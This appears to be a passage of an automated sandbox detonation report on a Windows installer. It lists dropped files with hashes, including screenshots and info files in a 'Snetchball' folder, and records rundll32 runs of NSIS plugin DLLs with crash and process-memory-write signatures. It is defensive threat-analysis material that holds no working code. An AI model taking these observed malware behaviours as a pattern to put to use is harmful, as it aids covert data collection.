C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\dist\esm\sign-with-hook.js

MD5 e61157a045cf028cd2459c95bd74776d
SHA1 2f1a773570dd23bc48c99d0e8c84bd04abcd427c
SHA256 d8a2b4085231b0cb61a6c73587848819523bff8cb5adea609ca195b88ff066b7
SHA512 a6fabc1d2bd80d3e93bcb6b250b49595d808b1cb8ff0ae8a2bc00ee604b3dca13c1dab01b7d58e2047a5e0103f0d6023813a1e155b3907275d128f8082eb128e

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\dist\esm\sea.js

MD5 3b9bc17097569fb1c73a34aad6d7493b
SHA1 d4ea25c201d0ec0f586c57a631b600460d745aa8
SHA256 54de0c136c220c31661d671cce67c199441d6ebf2b828e60557fe7e0fa29967d
SHA512 fcf0ec09818f6f2deee69a753cb7cdf8fb0939930bc70d8f325f7fdbaba8e97ec5bad0687931ab3bdafd5b9029d1faa15748122540d358f2ce703b0a04d586ab

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\@electron\windows-sign\vendor\signtool.exe

MD5 8a90e91a512dbf56d0d8d87b9a673e53
SHA1 e7126fe4cdd96f12e5ca9ca3246a1b905c941a44
SHA256 a36f5e81ce208137acc8fa9c00547c020fa10f044583002ccd23799b7f64078e
SHA512 6df1da08a81c21710cfb483b48209dfbb3bb36ef146e366b384c3be1c7034d313a116a23b87b1f3c9fb0f24158472dc37119fe5139434bfea6a34dc7f03bfb0e

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\create-desktop-shortcuts\index.js

MD5 205563f976ffb7fd7c60fdccbd7794cb
SHA1 a9cbd89014771bd437ae84b743ce49fed48b86df
SHA256 b2735872b2a36b0b017b1a5fce226370d6836ec066316a0e559a2c118e0cfe49
SHA512 75ea5f90636a43ec56506cb732e4e7c4290cc8d9480adf97b6ddad2ab2efaf0dc19f5020e31fae44a2ae62e596ef8e34deb1481c9a33aa8d6e7d3651d90b9609

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\create-desktop-shortcuts\api-type-definitions.js

MD5 129e5004e0ed840ab3b24186cdd4f69b
SHA1 51f51579c886db83fe644ae2cac21703b5d0a54a
SHA256 a619729f84e068513ff1404465de35472ad41bd3b600633dc2f3174b477080c0
SHA512 f6be717157cd8ebf46d1a1ca5846c5e89ea2e5e391d858f9d1ad79540e4b269a1517f75542924793b8cf6c0488060ca128f5906e0204347b0117e0c7484d9320

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\create-desktop-shortcuts\package.json

MD5 8a4ecbdf0d7058f5ef4429104dd1759d
SHA1 d2d07582927f64747122d0d3abfc237e412495ee
SHA256 dfe0f59649ec2ab079e5f3e6925e96803541be5da2d5b71cab552edda5f4501a
SHA512 81f4a8145295e7ca33caa126a672a0c4b77d30ec43133a4dd94f3161d6b1a382d5fce0feba6ba8e9e2018f06e7461722aa9f25ebd9d9320a068c0c7ad4ed1de7

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\create-desktop-shortcuts\LICENSE

MD5 b87aed05aac36b36d87be98309779793
SHA1 eeaf2430cbadd5b0c24d636725211ddd7d71c662
SHA256 68bad23b0c3035bfdb255406410d03097dc08b0f6d59f9858497d276cd953ddb
SHA512 acf7b4a93d590041dccc81c25246bcc50b20f48b3000e7790485db765b579bb64c5cd57ab4395ff09fefce0a974792163bd9f3da525b8de4af65ce15b8f28dba

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\create-desktop-shortcuts\src\helpers.js

MD5 a5c7f3db1c46228f30018c2787572f74
SHA1 2c45d98220089aee6eae4674d7772fbeb1927f3a
SHA256 872ba81a1d5926e66a14423d4ff7b35e3642e01e400ee0959993a1bb479611fb
SHA512 30cf7ca7095a4fef898ac16d081c004ad2cbab3211cda1f418a8c5a683a2455fce36d900d1c8bf7e12d6636cc1d22dcc1f8646d14daec76706ec7a608d9757e6

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\create-desktop-shortcuts\src\library.js

MD5 93498067b3b914b7176330a9167e617f
SHA1 826ac9514406b30fc8912e15d34c65a7c96f7213
SHA256 cbcb0e1b0ffc0cc0a8544885917450e1ff1837a8ddcca1d6ab8592a6abf91d42
SHA512 a3ebc2c092d57639fd3e820fc7e621a50f2197c8d775d8919b5233a387172b58e207caf7208a93df1e88c01c7af25a4a27981d2e84ca758fedd3844345c504c2

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\create-desktop-shortcuts\src\validation.js

MD5 b3622888d64c18f4bc45fd57545f7011
SHA1 82220d864473a7c157e74a33fa58be817582e6f9
SHA256 0d5f434d82f6d2a1990fe475dc24bc42f1287b494869a3b39dfbee3c1d1fb1c6
SHA512 0e1ebdc4140070f86a5210461c2e425ec7423207e5c7eac4be2bd2524bfb7d217ab820dd3b58c67f7a8dc20779f0bb56f744848d43b18a4570df35b9ba5ca5be

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\create-desktop-shortcuts\src\windows.vbs

MD5 b18daa53f25929438a549ef5cef114e1
SHA1 8d08853cb9286b6f6efb9e2a403bdd1a9a7bf5d8
SHA256 1529bc4babe8b8f81945ec965390fe68e1df8ed806b492e878e910b1ef4e71d7
SHA512 a53c251cbfd4a8dbe6e8cb6ccfcf2937fd2295a49a388f0db412f6cf5a87a05b33965350c55860f7e6f7768b1f14dad9710017e62feab8bc695aed12c445272d

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\node\installArchSpecificPackage.js

MD5 c866a4c96aee99d0a42d8901ff6d4884
SHA1 185ceafd2e21a7b7f8c899767d1be1240a51ad38
SHA256 0cf2f8df7555a24f45bbfc8de7675867e00ecf6049582b3242aa62b3ac77e9ed
SHA512 9f2c9b47526589c59e9d4e1ae134ea620eb96c5ee8ff9484a7e3f71bccd9e3e3ddae71680b1a53f12d28030d453f4722531432080294ec85194af206a6215319

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\node\package.json

MD5 345417549e8927245f506f6635b35fbc
SHA1 b8f02589e8aa5068985354bc555841829685c544
SHA256 4c221d43891d7884132469aad770b890a801b686d6f95da324f9d9f7a1f08ffa
SHA512 8e408a37125b2016deec788bb42e7175f86d17377e98c7a3ac6ac0cde919793bf8e86e52ce4e440809e7fa98660a6807a2d59d1b8c966fcdb02ed910c9509ec2

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\7z-out\resources\app.asar.unpacked\node_modules\node\bin\node

MD5 c0d2abf7d3fd5f932c06adf2d80efdff
SHA1 54d79709bcdab7157cee429192158de6cfe6f635
SHA256 1ac4ed15b141fd4e8684a12aa79f3c446df0bf41c237b83825170508c8843cce
SHA512 0242391b5b671c7b0533fd819c8775a5a3a739012d685552d86ed284468e1b5e4c4834116beae80c919393d4242f7fad21006295714530c1a18420100e564954

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\WinShell.dll

MD5 1cc7c37b7e0c8cd8bf04b6cc283e1e56
SHA1 0b9519763be6625bd5abce175dcc59c96d100d4c
SHA256 9be85b986ea66a6997dde658abe82b3147ed2a1a3dcb784bb5176f41d22815a6
SHA512 7acf7f8e68aa6066b59ca9f2ae2e67997e6b347bc08eb788d2a119b3295c844b5b9606757168e8d2fbd61c2cda367bf80e9e48c9a52c28d5a7a00464bfd2048f

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

C:\Users\Admin\AppData\Local\Temp\nspE6C.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Code Cache\js\b833acba66f1bb68_0

MD5 03dc14c85b6fddb8f69b8e31b0899e3c
SHA1 e2f6e9ac428d49bca338438c0a60409ff9b20757
SHA256 55f0f45abaa08321da4b7c19d8b0360e3b733ee63b71cf875c81a9050cb64352
SHA512 0da3a944110e0295beaae444346ac3993837624a483bd1529a2ea27c663a342357a704061773bee10ece48da141feee93ee3a281c99f619188300c1a16e29db9

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Code Cache\js\2e947ec36d06ed69_0

MD5 c977737310398ecab055f829d9810762
SHA1 e6978aa934b3fc70830e494cedb5812d5a701d1d
SHA256 b0218928eee32b1a9eb9b6b09bb837b927ac64dd9b30210eaf1938ef114552f3
SHA512 b6df7abda70da46009933d2a1c0c49d5ebfacc943dcc012c5751b0cb87926c6af8002fef5ebf9c01abf75e821e484a16578349bba07814ac6a8bb270aa77267c

C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg

MD5 be0d5cce5b968628a89e272bca070b02
SHA1 a5de6222570f9924ea76bd2afa95e46d6e893161
SHA256 761b19171cf16e6168bda63762e137ae2bfffc8af7f72f1e28078b0b91db5c4c
SHA512 4c1f8da05d8e6b89f2005c3a5d4b1b03e0ce42e9e33e1d1c4ab71dcf223e205466f77225bcbaaa8605d602bb62635c621bca040a065211b97b89e108beb8b4e7

C:\Users\Admin\AppData\Roaming\Snetchball\images\1.jpg

MD5 9920bc220833c651130c8e33263c4f62
SHA1 df6034f92eff435a02e9dd65c251772e32dec75f
SHA256 1361bc4b721e7419ff5592f74a1a33ea14cd8cefc57e04d02030e158774a0a00
SHA512 712dc1a710ac37d6440b463c39c9af9687d4afc7cba5630ac3eb1075012d29b035fe60b9eef4e6f9b06afb07479f227c35190bf61fd7ce7793c006f2bf5c2a79

memory/6344-5786-0x0000000008A80000-0x0000000008AF8000-memory.dmp

memory/6344-5787-0x000000000DBF0000-0x000000000E11C000-memory.dmp

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\TransportSecurity

MD5 993b94f52943ddef8e9c4cd6a216ef77
SHA1 ea81988113237fdac3744b0af007238c5f727f2d
SHA256 8a906a54aa7ebd177ee37e4529c0afb9af946233354254fa06f68c3efec563a4
SHA512 375b5d342c6d6d0c0b39cf46bded55fe920956f117eba954ce37f685c11cb1bfb2cc2aa2317b926fdecee6f5cdced97d5ce95b1eaa61117e09634806676a91bd

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Code Cache\js\index-dir\the-real-index

MD5 21bef19832227d1b0866e55400cf6fbe
SHA1 45d5db1e8f465e4db6b06bf9cd7ae8861502ab82
SHA256 07ad57d030141b02c9660566cbb9bedfccc5fc4e2f685525026a062a40fc2778
SHA512 b1796ac5e6495aacc1aa633614ff115ef3fc83ee49948b5ed4712725b4045a9c12c1e44179eaa483c3f7a91ba184cd17946ae8a72a53c6f7fd676f0fdc7cb9dd

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Network Persistent State

MD5 7df8b888f78bc30a65136cd3600af642
SHA1 c579cd4f6c0d657dfe6f2cdf8831097d54cb20c4
SHA256 bec8951727d6df6ff72d1e0a98f5dd031cabcc6a30645c22e05916f023026e17
SHA512 874c75f975db61670cf6f1dc7cfc556381ab8b5db56afbbd93090c2b5a99bbc2689001ee7d46f03a348b3cfc6c810d3cc6337a549f8d7670c2f2370dcfc24e55

C:\Users\Admin\AppData\Roaming\Snetchball\info_0.txt

MD5 d0e9cc8010f0766c244d7a837f9d8554
SHA1 84bb39717833532c6a0b843d04ed1436ad157357
SHA256 6c3c1ba48f822284e034c4c082930971bf24c8d9c0d688b58ca64d49d9bd644f
SHA512 92e58c6fa96265472e029113391799b577ebf723e5eb17faaa092163a023017dbb7a668678bd885ec6726170456ae369f2ea3df5449f191080d2c97592068357

C:\Users\Admin\AppData\Roaming\Snetchball\screen\screenshot.jpg

MD5 d2c64f98ead2e86c4929ac22d1753f20
SHA1 3d629c7af27030ed690e0eda36ab2635b1353dcb
SHA256 8757c4f0bbcc35213cf0cfab06fc9986351d9ecd4faf4c393c156b07d1c66d00
SHA512 7724331ad4ad67ef7b749c2926fad4da16606a5b3f7c44123781ec2f00f285e925e48a497a419518f49fdb0058aa556fda80c0d4502e2d9ab810b2790369537b

C:\Users\Admin\AppData\Roaming\Snetchball\info_0.txt

MD5 70679a4755c4e5a3d9c95e9e3005c3df
SHA1 dd0137836a4a977c3d4b9e1fdc475c033dff423a
SHA256 413af99c3db9c395e70a3457424915b128036e4405b38c23d179184fa55810ba
SHA512 149b0d9a830aa68ea36a3d52eb16eb4d2ff03fc565b87322a013f37ae33a51ffdbfedfcb313b9728f8303aab7f91ec2a0b3b5f1f3f84fb902b33d880704dd4f6

C:\Users\Admin\AppData\Roaming\utorrent\dht_feed.dat.new

MD5 d9180594744f870aeefb086982e980bb
SHA1 593b743b207e10ff55ec63e71a46c07909d0880a
SHA256 61098a4bf2a5e216533e5f2994d8f290308b310f2efa046548a96302afe412ea
SHA512 052d52f93faf4fa4037fc1e1cedec179253e47e3f2a11f7ef070fcfc393a7429dec341c46463b000d0a46f6d0e6de1325e1e43f7f01fe4605954df9035e0b080

C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg

MD5 438a6427de527ef4039416de599bdc42
SHA1 08a2ff8eaa42124c9d246fda4d7dbc7d35a5811c
SHA256 54218ac3ed7ee0e246dd9bf648f4d0373c3916da80ec8761b90a966e486c755f
SHA512 1ff1f47faeec7b9155a039793fc7a517436370175e5c97d8580a4a71eeb6e0219f30f7c5c62df960ff4f1ba333248dff7c20375b7aa353d4e82cabe424cc4d25

C:\Users\Admin\AppData\Roaming\Snetchball\images\2.jpg

MD5 9cc9d3031f4be34cf821d38341a7f302
SHA1 d92640fe44ac89d1f6d6ed741829c9aad300c3c7
SHA256 8ab030845ff1adb8dfac95142bf914023e61fb9747e2dea97fc1342308e0adc9
SHA512 eeb619233d15419ca2015e992c91f1ccbcd82e1c1208f79ca9b6b12ce4240d1120a78c5e08112e66aa85b20811e72dff62d6ee93aa67f250d775a76d84b18ad2

C:\Users\Admin\AppData\Roaming\Snetchball\images\1.jpg

MD5 f5ee4e093c7a463f381eb1a8fb04808b
SHA1 47ababcd0523be7a62be4b5727c579df77eccf94
SHA256 fc9bbc845f4194b7d35d17a6e07b6d7acc5c86a517c87dbb01b7c3206d945825
SHA512 360fc92d7e914c28b3072e055a50aa8cb2d84bed3a1982d3442a5f4a21677de945d51abea92978d2aee7f227c58581ab921e9dc10e6f2af7d05164d85ffa70aa

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Network Persistent State

MD5 bfc554867a6eb1be04543ca35ccd6f22
SHA1 76f917c43a8e5987e7dd69dd78b1a0c2ee14e75b
SHA256 d4de1f03ed3b96ddd0743d4998f0567d57acfb48c983b8e7492e83041db23bc5
SHA512 7f5aa8be1f88043b39f7b65a70fd13f5d786bec8df4cb8aba6c93b3d244cfeed0c6d3e98c3cb727cb9a78e1401c3e09fa30ae060f4a6ccb76350969c32348471

C:\Users\Admin\AppData\Roaming\Snetchball\info_0.txt

MD5 38cab9c819e186f78bf35f42f51ef263
SHA1 37417c743ee16026f92c319746db5ff4fdbf169d
SHA256 309f2e69f9fb9631d2460fa191287a25b2d475f51860283b9cf8396506aebb44
SHA512 b4c5b81154bb6f590f83eb5de873155b1149a4056bee522f2d86267dba08f6a45c07a3157b4f7d64109f5bcc9e948de68b10b88cabb644b9c29e733ad387e9b5

C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg

MD5 9fda60ecca37b7fabec8226df10e22d5
SHA1 fc293e789cff1461b6caa37ef50986c50db2fd54
SHA256 c044ed4d7d134d4f32daa126c8a3205b1763fd028ad8250a164ed768814f7f10
SHA512 db5836615531070dcaa4ab26b8e9a5a8d68d6dfb0983965099cbd0fd3deefe1995dad255a861a5a6149f2086b94ac6af2b5e887605fbf55687556735efb09503

C:\Users\Admin\AppData\Local\CEF\User Data\LocalPrefs.json

MD5 a02a54142af4311bc8dbe3268e3e3492
SHA1 bea3bcc0b248a2679b3acbbd631649e71b6e41f3
SHA256 82a03f00b1503e53922d77944d2cc2004249a97301560abbe1e7e6befa5d5961
SHA512 cff07ff3ca0697f36e3c6acbcb50c8a557c39b667eef9651b96940d60976b36c4431f7ddb6ccdee9020e96e93ba92b798d42ece3af517c4581d5feee79dc29b3

C:\Users\Admin\AppData\Roaming\Snetchball\screen\screenshot.png

MD5 e46f0f1068236a2de8d4979a335fcf53
SHA1 e0c4ad922f1919f08d1b05dafedbec3ba635cf62
SHA256 98d182b0524a5c793ba2e7efc7b2d26b081efa5d2115c76214fd1b4b49e2b067
SHA512 abc7516e3c308e62b6c491eb24d853fd12b2bd4f8b9ebf465f3fd5b18e6cdf8a84d5460a13d361cda9c3b93516edc325c7f5213dbccc71c53e58d59b6fb4d142

C:\Users\Admin\AppData\Roaming\Snetchball\info_0.txt

MD5 26838db620b2501dfd033377e4e18346
SHA1 bdcca811ed928ce1ea4f0c784fc6dac413b07395
SHA256 b0d2091c88b96f0fe304fb7f0b14e63e3ec8e6805088ead1e1d5a90b5d770447
SHA512 cce911c787b83ce019335ba31b803bf2533b6673d17e9915a5d90b0a528fb1c24d50cf06809b16020a241e63fc3cc76dc44c090cc87db299e9986399d4cea3e4

C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg

MD5 4ac494b9e5525afa7ed02cf423560d51
SHA1 dc6d45a1562241efb99e1b72a99ce9108128e3dd
SHA256 29d01cdfe48cce81ed1290f9c366b2d89a249e246fef0c581c394720918a0d5d
SHA512 eb8ac245e760a62066394772976abd745dd51d0f8b43378e920a64ac88957f8d1e06c61db00dd573e9748d022a808a5f64167cb773534e961cff4787a95d8780

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Code Cache\js\index-dir\the-real-index

MD5 a3f171614147617fed912bceb9c32c0c
SHA1 4b040319e1113d48167316170c181887aa4ae03a
SHA256 fd1447c294994fa302e2f2796851e45f2797d55bce3d310f20f5f59d15298a3e
SHA512 1ff86ac7e1d6ea8549a22b02d651715c70e763ca35e40a8ab33c31c434f65d699f1707b97a44d2c40b48e6625c4adf99c662ce91b7f7722cdb9ba7180f46b509

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\TransportSecurity

MD5 f0c98073ff569110f031e3b605eddb39
SHA1 83156f5cf23b45dfd1a66956d05ae83257769027
SHA256 c58697997bdb0b877dd45bdf3d6c9e4d1c3af310618a9d951f49550a082006e1
SHA512 668848fb0a5489ab45723492642a2119138bc1cdad1a6f1530af6d099bb273bf03e3469873b8af708fc22041d02a429bd5406afbba416b82d8f3be0ada6d6a59

C:\Users\Admin\AppData\Roaming\Snetchball\info_0.txt

MD5 104e9ab74baa3327f074bf99ed37c7fd
SHA1 0dd64aec5b5dcdadb5245090ab65aada71836242
SHA256 8cf31256a2264dc9ee4ccc9d10df1f63ac31150dc43cb1b0b6ea53bea1cba972
SHA512 e9f86d41524619b9cab4b684972e05b991fa8f3693d40e51f65a73ce170c5b3979492a482dc75bd0951c8dc03708bc962ffbb44eea66a4944af38d5a8e4cbc1b

C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg

MD5 8b44fef30476d4896664605e410f3a93
SHA1 881ea735e30499b691a24d8b679ef49a911d57c3
SHA256 fc289d38926d41b2b548ee2d1079a1136c57692c202e7e77ebed9099d634018a
SHA512 c2d79fba5db94ece1a5b5c5afa4b9efae3d4829079b5790142d69a67da24c2ad64ae14e6fe4c71b0e34329459318ba76cd49d633f9c532bb61fb686df4bb7055

C:\Users\Admin\AppData\Roaming\Snetchball\images\1.jpg

MD5 129b90cc906f749e8a5a1684071d64d8
SHA1 e4e82bb1543b9777df7cf557de2df05a10d78f69
SHA256 1895cc90d07f0ea8aab4c91a47a546df02eb4ffecddfe37e73ce1af756fc9c47
SHA512 59c3642aaa5919a281f28a393d67e465d98cdd1061a0be305c4da715fd0c34e4813ae26b697a0783cc61177adcffd4f399d062cec4973ec24abbba4ac11cb6b5

C:\Users\Admin\AppData\Roaming\Snetchball\images\2.jpg

MD5 100c0f8e22bdb14b6121708de5c54aef
SHA1 fd2f5413e1c67e9200b6e34f8c588164aecabb89
SHA256 4657efc07f6e9f5f8a6b2138e49ef02465f3c787ec68744c902bae548f3c2c8f
SHA512 d89543ab12aba6e074f315afb5a96222af591875c678e89e1ca5d8984230a0f8fb86302c6b08553dc949bbab1dcd381ed185a4e1e533a3ada834cca8f24411ab

C:\Users\Admin\AppData\Roaming\Snetchball\images\3.jpg

MD5 54feea87f970074d9b564ed59a68abad
SHA1 7d288be99bbd1c655b9df3de8c0d94468baa65c0
SHA256 5b69f611d410240519d9b3d9b079a0f6befc9d7a1b4b4ccea8cf29189a9336ed
SHA512 7c1e7beb2b2148876ea04773840de455b84cc34046756efb4c304153fcee5591dd187bef4ec02275bf6a3ca0ccf8cfc636ca8042503c49177a73b5c923a646c4

C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Default\Code Cache\js\index-dir\the-real-index

MD5 8a12c93e8c700e17b8d5c8d606853492
SHA1 7c1f517ae56d8ff1f04564036b22fc9fb004c45a
SHA256 204da1cb469083c12a88ffe3a057d76c76538cd083416d8de1ed8c65679135b7
SHA512 cb7a04a626696e19e42de6a336fa8b8136698237f73a28c51a9b0e7e121fdfbdc1ad2d5a533b49e21022bec0b11210813db4e58a6948393d6ef8556042415e39

C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg

MD5 506fa0c2e22c8aabbeabc7bac4836167
SHA1 d3b72fe895a1a77d53108fb28b8d7e7c6c5abbf3
SHA256 a9b9713e13e6e7cbec64fa60ab12b31e775b26681b0f0d85b7e667dadb456758
SHA512 a0906f262b5fb362a949fab6630a2fdd245b109f112683db9528241b9bd4dfee93d8510d5932f7cb685ac32ceeb91daeadf7aec5586f64446470cd9b91ff8a57

C:\Users\Admin\AppData\Roaming\Snetchball\results\1_info_0.txt

MD5 219ab43ee2780a5606a343bc33fbc00f
SHA1 ea756707b518679bf778ad32a4f49a58c95773f0
SHA256 2a50d0379509734dd325e48767abc05454d754581a4465866d5965f06827cc05
SHA512 2dc4d8b268e1ead6ca9ee9d0b11d3c1cd82ba9197774e87aac518b51f1b8e4c4b2900a237b40feb5e31d2cb6842eef5c9a7c148d1126998220e56c16c42b4fc5


Analysis: behavioral2

Detonation Overview

Submitted

2024-11-15 03:46

Reported

2024-11-15 03:49

Platform

win11-20241007-en

Max time kernel

91s

Max time network

94s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3552 wrote to memory of 1952 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 1952 -ip 1952

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1952 -s 488

Network

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-15 03:46

Reported

2024-11-15 03:50

Platform

win11-20241023-en

Max time kernel

146s

Max time network

152s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4008 wrote to memory of 4768 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4768 -ip 4768

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4768 -s 460

Network

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-15 03:46

Reported

2024-11-15 03:49

Platform

win11-20241007-en

Max time kernel

91s

Max time network

94s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\bt_datachannel.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3376 wrote to memory of 4360 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\bt_datachannel.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\bt_datachannel.dll,#1

Network

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-15 03:46

Reported

2024-11-15 03:49

Platform

win11-20241007-en

Max time kernel

92s

Max time network

95s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3540 wrote to memory of 4380 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4380 -ip 4380

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 544

Network

Country Destination Domain Proto
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-15 03:46

Reported

2024-11-15 03:49

Platform

win11-20241007-en

Max time kernel

147s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsisFirewall.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2160 wrote to memory of 4720 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsisFirewall.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsisFirewall.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4720 -ip 4720

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 468

Network

Files

N/A

